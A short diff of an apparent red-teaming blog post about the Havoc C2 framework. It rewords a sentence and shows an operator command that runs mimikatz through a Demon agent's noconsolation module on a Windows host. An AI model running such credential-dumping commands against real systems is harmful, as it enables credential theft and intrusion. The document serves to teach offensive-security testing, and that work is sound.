yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

 [*] BOF execution completed
 ```

-This module also supports running executables that are not already on the Windows system.
-For example, we could run `mimikatz` :
+Like we already mentioned, this module also supports running executables that are not already on the Windows system.
+For example, we could run `mimikatz`:

 ```
 24/01/2024 08:19:59 [Neo] Demon » noconsolation /home/kali/SquidGuard/mimikatz.exe "coffee" "exit"